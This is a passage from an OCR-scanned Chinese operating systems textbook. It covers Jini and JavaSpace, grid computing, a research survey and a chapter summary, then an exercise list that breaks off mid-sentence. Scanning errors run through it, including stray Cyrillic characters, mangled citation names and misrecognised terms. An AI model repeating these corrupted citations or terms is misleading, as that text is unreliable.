修改 掉 ， 不 过 系统 的 演进 并 不 会 影响 设备 的 硬件 和 软件 。 事 实 上 ， 设 备 甚至 不 用 明白 什么 是 注册 协议 。 
设备 所 需 明 白 的 只 是 整个 注册 过 程 中 的 一 段 ， 即 注册 的 设备 提供 的 一 些 属性 和 代理 代码 ， 这 样 其 他 设备 
稍 后 将 会 使 用 这 些 属性 和 代理 代码 ， 以 便 访问 该 设备 。 

寻找 某 个 特定 服务 的 设备 和 用 户 可 以 请 求 查询 服务 是 否 知道 这 样 的 一 个 特定 服务 存在 。 在 该 请 求 中 
可 以 包含 设备 在 注册 时 使 用 的 属性 。 如 果 请 求 成 功 ， 在 该 设备 注册 时 所 提供 的 代理 就 会 被 送 回 给 请 求 者 ， 
并 且 加 以 运行 以 联络 有 关 设 备 。 这 样 ， 设 备 或 用 户 就 可 以 同 其 他 的 设备 对 话 ， 而 无 须知 道 对 方 在 哪里 ， 
甚至 也 无 须知 道 对 话 所 用 的 协议 是 何 种 协议 。 

Jini 客户 机 和 服务 (硬件 或 软件 设备 ) 使 用 JavaSpace 进 行 通信 和 同步 ， 这 方式 实际 是 模仿 Linda 的 
元 组 空间 ， 但 存在 一 些 重要 的 差别 。 每 个 JavaSpace 由 一 些 强 类 型 的 记录 项 组 成 。 这 些 记录 项 与 Linda 的 
元 组 类 似 ， 不 过 它们 是 强 类 型 的 ， 而 Linda 的 元 组 则 是 无 类 型 的 。 在 每 个 记录 项 中 包含 一 些 域 ， 每 个 域 
中 有 一 个 基本 Java 类 型 。 例 如 ， 一 个 雇员 类 型 的 记录 项 可 以 包括 一 个 字符 串 (用 于 姓名 )、 一 个 整数 
(用 于 部 门 )、 第 二 个 整数 (用 于 电话 分 机 号 ) 以 及 一 个 布尔 值 ( 用 于 全 时 工作 )。 

在 JavaSpace 中 只 定义 了 四 个 方法 (尽管 其 中 的 两 个 方法 还 有 一 个 变种 ): 
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1) Write; 把 一 个 记录 项 放 入 JavaSpace。 

2) Read: 将 一 个 与 模板 匹配 的 记录 项 复制 出 JavaSpace。 

3) Take: 复制 并 移 走 一 个 与 模板 匹配 的 记录 项 。 

4) Notify: 当 一 个 匹配 的 记录 项 写 人 时 通知 调用 者 。 
write 方 法 提供 记录 项 并 确定 其 租约 时 间 ， 即 何 时 应 该 丢弃 该 记录 项 。 相 反 ， Linda 的 元 组 则 一 直 停 留 着 
直到 被 移出 为 止 。 在 JavaSpace 中 可 以 保存 有 同一 个 记录 项 的 多 个 副本 ， 所 以 它 不 是 一 个 数学 意义 上 的 集 
合 (如 同 Linda 那 样 ) 。 

read 和 take 方 法 为 要 寻找 的 记录 项 提供 了 一 个 模板 。 在 该 模板 的 每 个 域 中 有 一 个 必须 匹配 的 特定 值 ， 
或 者 可 以 包含 一 个 “不 在 乎 ”的 通配符 ， 该 通配符 可 以 匹配 所 有 合适 的 类 型 的 值 。 如 果 发 现 一 个 匹配 ， 
则 返回 该 记录 项 ， 而 在 take 的 情形 下 ， 该 记录 项 还 被 移出 了 JavaSpace 空 间 。 这 些 JavaSpace 方 法 中 的 每 一 
个 都 有 两 个 变种 ， 在 没有 匹配 到 记录 项 时 ， 它 们 之 间 有 所 差别 。 其 中 一 个 变种 即刻 返回 一 个 失败 的 标识 。 
而 另 一 个 则 一 直 等 到 时 间 段 (作为 一 个 参数 给 定 ) 到 期 为 止 。 

notify 方 法 用 一 个 特殊 模板 注册 兴趣 。 如 果 以 后 进来 了 一 个 相 匹配 的 记录 项 ， 就 调用 调用 者 的 notify 
方法 。 

与 Linda 中 的 元 组 空间 不 同 ，JavaSpace 支 持原 子 事务 处 理 。 通过 使 用 原子 事务 处 理 ， 可 以 把 多 个 方 
法 聚集 在 一 起 。 它 们 要 么 全 部 都 执行 要么 全 部 都 不 执行 。 在 该 事务 处 理 期 间 ， 在 该 事务 处 理 之 外 对 
JavaSpace 的 修改 是 不 可 见 的 。 只 有 在 该 事务 处 理 结束 之 后 ， 它们 才 对 其 他 的 调用 者 可 见 。 

可 以 在 通信 进程 之 间 的 同步 中 运用 Javaspace。 例 如 ， 在 生产 者 -消费 者 的 情形 下 ， 生 产 者 在 产品 生 
产 出 来 之 后 可 以 把 产品 放 进 JavaSpace 中 。 消 费 者 使 用 take 取 走 这 些 产品 ， 如 果 产 品 没有 了 就 阻塞 。 
JavaSpace 保 证 每 个 方法 的 执行 都 是 原子 性 的 ， 所 以 不 会 出 现 当 一 个 进程 试图 读 出 一 个 记录 项 时 ， 该 记录 
项 仅仅 完成 了 一 半 进 入 的 危险 。 
8.4.7 网 格 

如 果 没 有 谈 及 最 新 的 发 展 ， 即 在 未 来 有 可 能 变 得 非常 重要 的 网 格 ， 那 么 ， 对 于 分 布 式 系统 的 论述 将 
是 不 完整 的 。 所 谓 网 格 (grid)， 是 一 个 大 的 、 地 理 上 分 散 的 、 通常 是 由 私有 网 络 或 因特网 连接 起 来 的 异 
构 机 器 的 集合 ， 向 用 户 提供 一 系列 服务 。 有 时 候 网 格 也 被 比 作 虚 拟 超 级 计算 机 ， 但 其 实 还 不 只 是 这 样 。 
它 是 很 多 独立 计算 机 的 集合 ， 一 般 位 于 多 个 管理 域 中 ， 所 有 的 这 些 管理 域 都 会 运行 中 间 件 的 一 个 公共 的 
中 间 件 层 以 便 用 户 和 程序 可 以 通过 方便 和 一 致 的 方式 访问 所 有 资源 。 

构建 网 格 的 初始 动机 是 为 了 CPU 的 时 钟 周 期 共享 。 当 时 的 想法 是 ， 当 一 个 机 构 不 需要 它 的 全 部 的 计 
算 能 力 时 (例如 在 夜间 )， 另 一 个 机 构 (可 能 相隔 好 几 个 时 区 ) 就 可 以 利用 这 些 时 钟 周期 ， 并 且 12 小 时 之 
后 也 对 外 提供 这 样 的 帮助 。 现 在 ， 网 格 研究 人 员 也 在 关注 其 他 资源 的 共享 ， 尤其 是 专门 硬件 和 数据 库 。 

典型 地 , 网 格 的 工作 原理 是 ; 在 每 个 参与 的 机 器 中 运行 一 组 管理 机 器 并 且 把 它 加 入 到 网 格 中 的 程序 。 
这 个 程序 通常 需要 处 理 认证 及 远程 用 户 登 录 、 资 源 发 布 及 发 现 、 作业 调度 及 分 配 等 。 当 某 个 用 户 有 工作 
需要 计算 机 来 做 时 ， 网 格 软件 决定 哪里 有 空闲 的 硬件 、 软件 和 数据 资源 来 完成 这 项 工作 ， 然 后 将 作业 搬 
运 过 去 ， 安 排 执行 并 收集 计算 结果 返回 给 用 户 。 

在 网 格 世界 中 ， 一 个 流行 的 中 间 件 叫 Globus Toolkit， 它 在 很 多 平台 上 都 是 可 用 的 并 且 支 持 很 多 
(即将 出 现 的 ) 网 格 标准 (Foster, 2005), Globus 通 过 灵活 和 安全 的 方式 提供 一 个 供用 户 共享 计算 机 、 
文件 以 及 其 他 资源 的 平台 ， 同 时 又 不 会 斩 牲 本 地 的 自治 性 。 网 格 正在 成 为 很 多 分 布 式 应 用 的 构建 基础 。 


8.5 有 关 多 处 理 机 系统 的 研究 

在 本 章 中 ， 我 们 考察 了 四 类 多 处 理 器 系统 ， 多 处 理 器 、 多 计算 机 、 虚拟 机 和 分 布 式 系统 。 下 面 简要 
地 介绍 在 这 些 领 域 中 的 有 关 研 究 工作 。 

在 多 处 理 器 领域 中 的 多 数 研究 与 硬件 有 关 ， 特别 是 与 如 何 构建 共享 存储 器 和 保持 其 一 致 性 (如 
Higham 等 人 ，2007) 有 关 。 然 而 ， 还 有 一 些 关于 多 处 理 器 的 其 他 研究 ， 特别 是 片上 多 处 理 器 ， 包 括 编 
程 模型 和 随 之 带 来 的 操作 系统 问题 (Fedorova 等 人 ，2005， Tan 等 人 ，2007)、 通 信 机 制 (Brisolara 等 人 ， 
2007)、 软 件 的 能 源 管理 (Park 等 人 ，2007)、 安 全 (Yang 和 Peng，2006) 还 有 未 来 的 挑战 (Wolf, 
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2004)。 另 外 ， 对 调度 的 研究 也 总 是 很 流行 (Chen 等 人 ，2007，Lin 和 Rajaraman ，2007，Rajagopalan 等 
人 ，2007，Tam 等 人 ，2007，Yahav 等 人 ，2007) 。 

多 计算 机 比 多 处 理 器 更 容易 构建 。 所 需要 的 只 是 一 批 PC 机 或 工作 站 ， 以 及 一 个 高 速 网 络 。 由 于 这 
个 原因 ， 在 大 学 中 多 计算 机 是 一 个 热门 的 研究 课题 。 有 许多 工作 与 这 样 或 那样 的 分 布 式 共享 存储 器 有 关 ， 
有 些 是 基于 页 面 的 ， 有 些 是 在 整个 软件 中 的 (Byung-Hyun 等 人 ，2004，Chapman 和 Heiser，2005， 
Huang 等 人 ，2001，Kontothanassis 等 人 ，2005，Nikolopoulos 等 人 ，2001，Zhang 等 人 ，2006)。 编 程 模 
型 也 正在 被 研究 (Dean 和 Ghemawat，2004) 。 当 规模 达到 好 几 万 个 CPU 的 时 候 ， 数 据 中 心 的 能 源 使 用 也 
是 一 个 问题 (Bash 和 Forman，2007，Ganesh 等 人 ，2007，Villa，2006)。 

虚拟 机 是 一 个 特别 热门 的 话题 ， 针 对 不 同 的 方面 有 许多 论文 ， 包 括 能 源 管理 (Moore 等 人 ，2005， 
Stoess 等 人 ，2007)、 内 存 管理 (Lu 和 Shen，2007) 和 信任 管理 (Garfinkel 等 人 ，2003，Lei 等 人 ，2003) 。 
安全 也 是 一 个 方面 (Jaeger 等 人 ，2007)。 性 能 优化 也 是 一 个 很 有 意思 的 问题 ， 特 别 是 CPU 的 性 能 (King 
等 人 ，2003)、 网 络 性 能 (Menon 等 人 ,2006)、1/O 性 能 (Cherkasova 和 Gardner，2005，Liu 等 人 ，2006) 。 
虚拟 机 使 得 迁移 变 得 可 行 ， 所 以 这 个 话题 也 引起 了 关注 (Bradford Л, 2007, Ниапр A, 2007), № 
拟 机 也 已 经 被 用 来 调试 操作 系统 (King 等 人 ，2005)。 

随 着 分 布 式 计算 的 发 展 ， 已 经 有 很 多 关于 分 布 式 文件 及 存储 系统 方面 的 研究 ， 遇 到 的 问题 包括 : Ж 
遇 软 硬件 错误 、 人 为 错误 、 自 然 灾害 时 的 长 期 可 维护 性 (Baker 等 人 ，2006; Kotla 等 人 ，2007， 
Maniatis 等 人 ，2005，Shah 等 人 ，2007，Storer 等 人 ，2007)、 使 用 不 可 信 的 服务 器 (Adya 等 人 ，2002， 
Popescu 等 人 ，2003)、 认 证 (Kaminsky 等 人 ，2003) 和 分 布 式 文件 系统 的 可 扩展 性 (Ghemawat 等 人 ， 
2003，Saito，2002，Weil 等 人 ，2006)。 如 何 扩展 分 布 式 系统 也 已 经 被 研究 (Peek 等 人 ，2007)。 点 对 点 
(P2P) 分 布 式 文件 系统 也 被 广泛 地 研究 (Dabek 等 人 ，2001，Gummadi 等 人 ，2003，Muthitacharoen 等 
人 ，2002，Rowstron 和 Druschel，2001)。 在 有 一 些 节点 可 以 移动 的 情况 下 ， 能 源 有 效 利用 率 也 开始 变 
得 很 重要 (Nightingale 和 Flinm，2004)。 


8.6 小 结 

采用 多 个 CPU 可 以 把 计算 机 系统 建造 得 更 快 更 可 靠 。CPU 的 四 种 组 织 形 式 是 多 处 理 器 、 多 计算 机 、 
虚拟 机 和 分 布 式 系统 。 其 中 的 每 一 种 都 有 其 自己 的 特性 和 问题 。 

一 个 多 处 理 器 包括 两 个 或 多 个 CPU， 它 们 共享 一 个 公共 的 RAM。 这 些 CPU 可 以 通过 总 线 、 交 叉 开 
关 或 一 个 多 级 交换 网 络 互 连 起 来 。 各 种 操作 系统 的 配置 都 是 可 能 的 ， 包 括 给 每 个 CPU 配 一 个 各 自 的 操作 
系统 、 配 置 一 个 主 操作 系统 而 其 他 是 从 属 的 操作 系统 或 者 是 一 个 对 称 多 处 理 器 ， 在 每 个 CPU 上 都 可 运行 
的 操作 系统 的 一 个 副本 。 在 后 一 种 情形 下 ， 需 要 用 锁 提 供 同步 。 当 没有 可 用 的 锁 时 ，-- 个 CPU 会 空转 或 
者 进行 上 下 文 切换 。 各 种 调度 算法 都 是 可 能 的 ， 包 括 分 时 、 空 间 分 割 以 及 群 调度 。 

多 计算 机 也 有 两 个 或 更 多 的 CPU， 但 是 这 些 CPU 有 自己 的 私有 存储 器 。 它 们 没有 任何 公共 的 RAM， 
所 以 全 部 的 通信 通过 消息 传递 完成 。 在 有 些 情形 下 ， 网 络 接口 卡 有 自己 的 CPU， 此 时 在 主 CPU 和 接口 板 
上 的 CPU 之 间 的 通信 必须 仔细 地 组 织 ， 以 避免 竞争 条 件 的 出 现 。 在 多 计算 机 中 的 用 户 级 通信 常常 使 用 远 
程 过 程 调用 ， 但 也 可 以 使 用 分 布 式 共享 存储 器 。 这 里 进程 的 负载 平衡 是 一 个 问题 ， 有 多 种 算法 用 以 解决 
该 问题 ， 包 括 发 送 者 -驱动 算法 、 接 收 者 -驱动 算法 以 及 竞标 算法 等 。 

虚拟 机 克 许 一 个 或 多 个 实际 的 CPU 提供 比 现 有 CPU 数量 更 多 的 假象 。 通 过 这 种 方式 ， 可 以 同时 在 同 
一 个 硬件 上 运行 多 种 操作 系统 ， 或 者 同一 个 操作 系统 的 不 同 (不 兼容 ) 的 版 本 。 当 结合 了 多 核 的 设计 ， 
每 台 计算 机 就 变 成 了 一 个 潜在 的 大 规模 多 计算 机 。 

分 布 式 系统 是 一 个 松散 耦合 的 系统 ， 其 中 每 个 节点 是 一 台 完 整 的 计算 机 ， 配 有 全 部 的 外 部 设备 以 及 
自己 的 操作 系统 。 这 些 系统 常常 分 布 在 较 大 的 地 理 区 域内 。 在 操作 系统 上 通常 设计 有 中 间 件 ， 从 而 提供 
-个 统一 的 层次 以 方便 与 应 用 程序 的 交互 。 中 间 件 的 类 型 包括 基于 文档 、 基 于 文件 、 基 于 对 象 以 及 基于 
协调 的 中 间 件 。 有 关 的 一 些 例子 有 World Wide Web、CORBA、Linda 以 及 Jini。 


多 处 理 机 大 统 
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习题 


.可 以 把 USENET 新 闻 组 系统 和 SETI@home 项 目 

看 作 分 布 式 系统 吗 ? (SETI@home 使 用 数 百 万 
台 空 闲 的 个 人 计算 机 ， 用 来 分 析 无 线 电 频 谱 数 
据 以 搜寻 地 球 之 外 的 智慧 生物 )。 如 果 是 ， 它 们 
属于 图 8-1 中 描述 的 哪些 类 ? 

- 如果 一 个 多 处 理 器 中 的 两 个 CPU 在 同一 时 刻 ， 
试图 访问 内 存 中 同一 个 字 ， 会 发 生 什么 事情 ? 

-如果 一 个 CPU 在 每 条 指令 中 都 发 出 一 个 内 存 访 
问 请 求 ， 而 且 计算 机 的 运行 速度 是 200MIPS ， 
那么 多 少 个 CPU 会 使 一 个 400MHz 的 总 线 饱 和 ? 
假设 对 内 存 的 访问 需要 一 个 总 线 周期 。 如 果 在 
该 系统 中 使 用 缓存 技术 ， 且 缓存 命中 率 达到 
90%， 那 么 多 少 个 CPO 会 使 总 线 饱和 ? 最 后 ， 
如 果 要 使 32 个 CPU 共 享 该 总 线 而 且 不 使 其 过 载 ， 
需要 多 高 的 命中 率 ? 

:在 图 8-5 的 omega 网 络 中 ， 假 设 在 交换 网 络 2A 和 
交换 网 络 3B 之 间 的 连 线 断 了 。 那 么 哪些 节点 之 
间 的 联系 被 切断 了 ? 

5. 在 图 8-7 的 模型 中 ， 信 号 是 如 何 处 理 的 ? 

6. 使 用 纯 read 重 写 图 2-22 中 的 enter_region 代 码 ， 

用 以 减少 由 TSL 指 令 所 引起 的 癸 得。 

7. 多 核 CPU 开始 在 普通 的 桌面 机 和 笔记 本 电脑 上 
出 现 ， 拥 有 数 十 乃至 数 百 个 核 的 桌面 机 也 为 期 
不 远 了 。 利 用 这 些 计 算 能 力 的 一 个 可 能 的 方式 
是 将 标准 的 桌面 应 用 程序 并 行 化 ， 例 如 文字 处 
理 或 者 Web 浏 览 器 ， 另 一 个 可 能 的 方式 是 将 操 
作 系 统 提 供 的 服务 (例如 TCP 操 作 ) 和 常用 的 
库 服 务 (例如 安全 http 库 函数 ) 并 行 化 。 你 认为 
哪 一 种 方式 更 有 前 途 ? 为 什么 ? 

8. 为 了 避免 竞争 ， 在 SMP 操 作 系 统 代码 段 中 的 临 
界 区 真 的 有 必要 吗 ， 或 者 数据 结构 中 的 互 斥 信 
号 量 也 可 完成 这 项 工作 吗 ? 

9. 在 多 处 理 器 同步 中 使 用 TSL 指 令 时 ， 如 果 持 有 

锁 的 CPU 和 请 求 锁 的 CPU 都 需要 使 用 这 个 拥有 

互 斥 信号 量 的 高 速 缓冲 块 ， 那 么 这 个 拥有 互 斥 

信号 量 的 高 速 缓冲 块 就 得 在 上 述 两 个 CPU 之 间 

来 回 穿 梭 。 为 了 减少 总 线 交通 的 繁忙 ， 每 晤 50 

个 总 线 周 期 ， 请 求 锁 的 CPU 就 执行 一 条 TSL 指 

令 ， 但 是 持 有 锁 的 CPU 在 两 条 TSL 指 令 之 间 需 

要 频繁 地 引用 该 拥有 互 斥 信号 量 的 高 速 缓冲 块 。 

如 果 一 个 高 速 缓冲 块 中 有 16 个 32 位 字 ， 每 一 个 

字 都 需要 用 一 个 总 线 周期 传送 ， 而 该 总 线 的 频 

率 是 400MHz， 那 么 高 速 缓冲 块 的 来 回 移动 会 占 

用 多 少 总 线 带宽 ? 


N 


w 


a 


10. 课文 中 曾经 建议 在 使 用 TSL 轮 询 锁 之 间 使 用 二 
进 制 指数 补偿 算法 。 也 建议 过 在 轮 询 之 间 使 用 
最 大 时 延 。 如 果 没 有 最 大 时 延 ， 该 算法 会 正确 
工作 吗 ? 

:假设 在 一 个 多 处 理 器 的 同步 处 理 中 没有 TSL 指 

令 。 相 反 ， 提 供 了 另 一 个 指令 SWP ， 该 指令 

可 以 把 一 个 寄存 器 的 内 容 交换 到 内 存 的 一 个 字 

中 。 这 个 指令 可 以 用 于 多 处 理 器 的 同步 吗 ? 如 

果 可 以 ， 它 应 该 怎样 使 用 ? 如 果 不 行 ， 为 什么 

它 不 行 ? 

12. 在 本 问题 中 ， 读 者 要 计算 把 一 个 自 旋 锁 放 到 总 
线 上 需要 花费 总 线 的 多 少 装载 时 间 。 假 设 CPU 
执行 每 条 指令 花费 5 纳 秒 。 在 一 条 指令 执行 完 
毕 之 后 ， 不 需要 任何 总 线 周期 例如， 执行 
TSL 指 令 。 每 个 总 线 周期 比 指令 执行 时 间 长 10 
纳 秒 甚至 更 多 。 如 果 一 个 进程 使 用 TSL 循 环 试 
图 进入 某 个 临界 区 ， 它 要 耗费 多 少 的 总 线 带 
Ж? 假设 通常 的 高 速 缓冲 处 理 正在 工作 ， 所 以 
取 一 条 循环 体 中 的 指令 并 不 会 浪费 总 线 周 期 。 

13. 图 8-12 用 于 描绘 分 时 环境 ， 为 什么 在 b 部 分 中 
只 出 现 了 进程 A? 

14. 亲 和 调度 减少 了 高 速 缓冲 的 失效 。 它 也 减少 
TLB 的 失效 吗 ? 对 于 缺 页 呢 ? 

15. 对 于 图 8-16 中 的 每 个 拓扑 结构 ， 互 连 网 络 的 直 
径 是 多 少 ?请 计算 该 问题 的 所 有 跳 数 (主机 一 
路 由 器 和 路 由 器 -路 由 器 )。 

16. 考虑 图 8-16 d 中 的 双 凸 面 拓扑 ， 但 是 扩展 到 
大 xK。 该 网 络 的 直径 是 多 少 ? 提示 : 分别 考虑 
是 奇数 和 偶数 的 情况 。 

17. 互联 网 络 的 平分 贷款 经 常用 来 测试 网 络 容量 。 
其 计算 方法 是 ， 通 过 移 走 最 小 数量 的 链接 ， 将 
网 络 分 成 两 个 相等 的 部 分 。 然 后 把 被 移 走 链接 
的 容量 加 入 进去 。 如 果 有 很 多 方法 进行 分 割 ， 
那么 最 小 带宽 就 是 其 平分 带宽 。 对 于 有 一 个 
8 x 8 x 8 立方 体 的 互连网 络 ， 如 果 每 个 链接 的 
带宽 是 1Gbps， 那 么 其 平分 带宽 是 多 少 ? 

18. 如 果 多 计算 机 系统 中 的 网 络 接口 处 于 用 户 模 
式 ， 那 么 从 源 RAM 到 目的 RAM 只 需要 三 个 副 
本 。 假 设 该 网 络 接口 卡 接收 或 发 送 一 个 32 位 的 
字 需 要 20ns， 并 且 该 网 络 接口 卡 的 频率 是 
1Gbps。 如 果 忽 略 掉 复制 的 时 间 ， 那 么 把 一 个 
64 字 节 的 包 从 源 送 到 目的 地 的 延 时 是 多 少 ? 如 
果 考 虑 复制 的 时 间 呢 ?接着 考虑 需要 有 两 次 额 
外 复制 的 情形 ， 即 在 发 送 方 将 数据 复制 到 内 核 
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的 时 间 ， 和 在 接收 方 将 数据 从 内 核 中 取出 的 时 
间 。 在 这 种 情形 下 的 延 时 是 多 少 ? 

19. 对 于 三 次 复制 和 五 次 复制 的 情形 ， 重 复 前 一 个 
问题 ， 不 过 这 次 是 计算 带宽 而 不 是 计算 延 时 。 
20. 在 共享 存储 器 多 处 理 器 和 多 计算 机 之 间 send 
和 receive 的 实现 要 有 多 少 差别 ， 这 些 差 别 对 

性 能 有 何 影响 ? 

21. 在 将 数据 从 RAM 传 送 到 网 络 接口 时 ， 可 以 使 
用 和 钉 住 页 面 的 方法 ， 假 设 钉 住 和 释放 页 面 的 系 
统 调用 要 花费 1 微 秒 时 间 。 使 用 DMA 方法 复制 
速度 是 5 字 节 / 纳 秒 ， 而 使 用 编程 110 方 法 需要 
20 纳 秒 。 一 个 数据 包 应 该 有 多 大 才 值 得 钉 住 页 
面 并 使 用 DMA 方 法 ? 

22. 将 一 个 过 程 从 一 台 机 器 中 取出 并 且 放 到 另 一 台 
机 器 上 称 为 RPC， 但 会 出 现 一 些 问题 。 在 正文 
中 ， 我 们 指出 了 其 中 四 个 : 指针 、 未 知 数组 大 
小 、 未 知 参 数 类 型 以 及 全 局 变量 。 有 一 个 未 讨 
论 的 问题 是 ， 如 果 (远程 ) 过 程 执行 一 个 系统 
调用 会 怎样 。 这 样 做 会 引起 什么 问题 ， 应 该 怎 
样 处 理 ? 

23. 在 DSM 系 统 中 ， 当 出 现 一 个 页 面 故障 时 ， 必 
须 对 所 需要 的 页 面 进行 定位 。 请 列 出 两 种 寻找 
该 页 面 的 可 能 途径 。 

24. 考虑 图 8-24 中 的 处 理 器 分 配 。 假 设 进程 H 从 节 
点 2 被 移 到 节点 3 上 。 此 时 的 外 部 信息 流量 是 多 
少 ? 

25. 某 些 多 计算 机 允许 把 运行 着 的 进程 从 一 个 节点 
迁移 到 另 一 个 节点 。 停 止 一 个 进程 ， 冻 结 其 内 
存 映像 ， 然 后 就 把 他 们 转移 到 另 一 个 节点 上 是 
否 是 够 ? 请 指出 要 使 所 述 的 方法 能 够 工作 的 两 
个 必须 解决 的 问题 。 

26. 考虑 能 同时 支持 最 多 n 个 虚拟 机 的 ! 型 管理 程序 ， 
PC 机 最 多 可 以 有 4 个 主 磁盘 分 区 。 请 问 " 可 以 比 
4 大 吗 ? 如 果 可 以 ， 数 据 可 以 存在 哪里 ? 

27. 处 理 客户 操作 系统 使 用 普通 (非特 权 ) 指令 改 
变 页 表 的 一 个 方式 是 将 页 表 标记 为 只 读 ， 所 以 
当 它 被 修改 的 时 候 系统 陷入。 还 有 什么 方式 可 
以 维护 页 表 副本 (shadow page table) ? 比较 
你 的 方法 与 只 读 页 表 方 式 在 效率 上 的 差别 。 

28. VMware 每 次 对 一 个 基本 块 进行 二 进 制 转换 ， 
然后 执行 这 个 基本 块 并 开始 转换 下 一 个 基本 
块 。 它 能 事先 转换 整个 程序 然后 执行 吗 ? ШЖ 
能 ， 每 种 技术 的 优点 和 缺点 分 别 是 什么 ? 

29. 如 果 一 个 操作 系统 的 源 代码 可 以 得 到 ， 对 半 虚 
拟 化 一 个 操作 系统 有 意义 吗 ? 如 果 源 代码 不 能 
得 到 呢 ? 


30. 各 种 PC 在 底层 会 有 微小 的 差别 ， 例 如 如 何 管 
理 时 钟 、 如 何 处 理 中 断 以 及 DMA 方 面 的 一 些 
细节 。 那 么 这 些 差 别 是 否 意味 着 虚拟 机 在 实际 
中 不 能 够 很 好 地 工作 ? 请 解释 你 的 答案 。 

31. 在 以 太 网 上 为 什么 会 有 对 电缆 长 度 的 限制 ? 

32. 在 一 台 PC 上 运行 多 个 虚拟 机 需要 大 量 的 内 存 ， 
为 什么 ?你 能 想 出 什么 方式 降低 内 存 的 使 用 
量 ? 请 解释 理由 。 

33. 在 图 8-30 中 ， 四 台 机 器 上 的 第 三 层 和 第 四 层 标 

记 为 中 间 件 和 应 用 。 在 何 种 角度 上 它们 是 跨 平 

台 一 致 的 ， 而 在 何 种 角度 上 它们 是 跨 平台 有 差 

异 的 ? 

:在 图 8-33 中 列 出 了 六 种 不 同 的 服务 。 对 于 下 面 

的 应 用 ， 哪 一 种 更 适用 ? 

a) Internet 上 的 视频 点 播 。 

b) 下 载 一 个 网 页 。 

35. DNS 的 名 称 有 一 个 层次 结构 ， 如 cs.uni.edu 或 
sales.general-widget.com。 维 护 DNS 数 据 库 的 
一 种 途径 是 使 用 一 个 集中 式 的 数据 库 ， 但 是 实 
际 上 并 没有 这 样 做 ， 其 原因 是 每 秒 钟 会 有 太 多 
的 请 求 。 请 提出 一 个 实用 的 维护 DNS 数据 库 的 
建议 。 

36. 在 讨论 浏览 器 如 何 处 理 URL 时 ， 曾 经 说 明 与 端 
口 80 连 接 。 为 什么 ? 

37. 虚拟 机 迁移 可 能 比 进程 迁移 容易 ， 但 是 迁移 仍 
然 是 困难 的 。 在 虚拟 机 迁移 的 过 程 中 会 产生 哪 
些 问题 ? 

38. 在 显示 网 页 中 使 用 的 URL 可 以 透明 吗 ? 请 解释 
理由 。 

39. 当 浏 览 器 获取 一 个 网 页 时 ， 它 首先 发 起 一 个 
TCP 链 接 以 获得 页 面 上 的 文本 (该 文本 用 
HTML 语 言 写成 )。 然 后 关闭 链接 并 分 析 该 页 
面 。 如 果 页 面 上 有 图 形 或 图 标 ， 就 发 起 不 同 的 
TCP 链 接 以 获取 它们 。 请 给 出 两 个 可 以 改善 性 
能 的 替代 建议 。 

40. 在 使 用 会 话语 义 时 ， 有 一 项 总 是 成 立 的 ， 即 一 

个 文件 的 修改 对 于 进行 该 修改 的 进程 而 言 是 立 

即 可 见 的 ， 而 对 其 他 机 器 上 的 进程 而 言 是 绝对 

不 可 见 的 。 不 过 存在 一 个 问题 ， 即 这 种 修改 对 

同一 台 机 器 上 的 其 他 进程 是 否 应 该 立即 可 见 。 

请 提出 正 反 双 方 的 争辩 意见 。 

- 当 有 多 个 进程 需要 访问 数据 时 ， 基 于 对 象 的 访 

问 在 哪些 方面 要 好 于 共享 存储 器 ? 

-在 Linda 的 in 操 作 完 成 对 一 个 元 组 的 定位 之 后 ， 

线性 地 查询 整个 元 组 空间 是 非常 低 效率 的 。 请 

设计 一 个 组 织 元 组 空间 的 方式 ， 可 以 在 所 有 的 
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in 操作 中 加 快 查询 操作 。 


.缓存 区 的 复制 很 花费 时 间 。 写 一 个 C 程 序 找 出 


你 访问 的 系统 中 这 种 复制 花费 了 多 少时 间 。 可 
使 用 clock 或 times 函 数 用 以 确定 在 复制 一 个 大 
数组 时 所 花费 的 时 间 。 请 测试 不 同 大 小 的 数组 ， 
以 便 把 复制 时 间 和 系统 开销 时 间 分 开 。 


.编写 可 作为 客户 机 和 服务 器 代码 片段 的 C 函 


数 ， 使 用 RPC 来 调用 标准 printf 函数 ， 并 编写 
一 个 主 程序 来 测试 这 些 函 数 。 客 户 机 和 服务 器 
通过 一 个 可 在 网 络 上 传输 的 数据 结构 实现 通 
信 。 读 者 可 以 对 客户 机 所 能 接收 的 格式 化 字符 
串 长 度 以 及 数字 、 类 型 和 变量 的 大 小 等 方面 设 
置 限制 。 

写 两 个 程序 用 以 模拟 一 台 多 计算 机 上 的 负载 平 
衡 。 第 一 个 程序 应 该 按照 一 个 初始 化 文件 把 m 
个 进程 分 布 到 n 个 机 器 上 。 每 个 进程 应 该 有 一 
个 通过 Gaussian 分 布 随机 挑选 的 运行 时 间 ， 即 
该 分 布 的 平均 值 和 标准 偏差 是 模拟 的 参数 。 在 
每 次 运行 的 结尾 ， 进 程 创建 一 些 新 的 进程 ， 按 
照 Poisson 分 布 选择 这 些 新 进程 。 当 一 个 进程 
退出 时 ，CPU 必 须 确定 是 放弃 进程 或 是 寻找 新 
的 进程 。 如 果 在 机 器 上 有 总 数 超过 k 个 进程 的 
话 ， 第 一 个 程序 应 该 使 用 发 送 者 驱动 算法 放弃 
工作 。 第 二 个 程序 在 必要 时 应 该 使 用 接收 者 驱 
动 算法 获得 工作 。 请 给 出 所 需要 的 合理 假设 ， 
但 要 写 出 清楚 的 说 明 。 


. 写 一 个 程序 ， 实 现 8.2 节 中 描述 的 发 送 方 驱 动 和 


接收 方 驱动 的 负载 平衡 算法 。 这 个 算法 必须 把 
新 创建 的 作业 列表 作为 输入 ,作业 的 描述 为 
(creating_processor, start_time, 
required_CPU_time) ， 其 中 creating_processor 表 
示 创 建 作业 的 CPU 序号 ，start_time 表 示 创 建 作 
业 的 时 间 ，required_CPU_time 表 示 完 成 作业 所 
需要 的 时 间 (以 秒 为 单位 ) 。 当 节点 在 执行 一 
个 作业 的 同时 有 第 二 个 作业 被 创建 ， 则 认为 该 
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节点 超 负 荷 。 在 重负 载 和 轻 负载 的 情况 下 分 别 
打印 算法 发 出 的 探测 消息 的 数目 。 同 时 ， 也 要 
打印 任意 主机 发 送 和 接收 的 最 大 和 最 小 的 探 针 
数 。 为 了 模拟 负载 ， 要 写 两 个 负载 产生 器 。 第 
一 个 产生 器 模拟 重 的 负载 ， 产 生 的 负载 为 平均 
每 隔 AJL 秒 N 个 作业 ， 其 中 AJL 是 作业 的 平均 长 
度 ，N 是 处 理 器 个 数 。 作 业 长 度 可 能 有 长 有 短 ， 
但 是 平均 作业 长 度 必须 是 AJL。 作 业 必 须 随机 
地 创建 (放置 ) 在 所 有 处 理 器 上 。 第 二 个 产生 
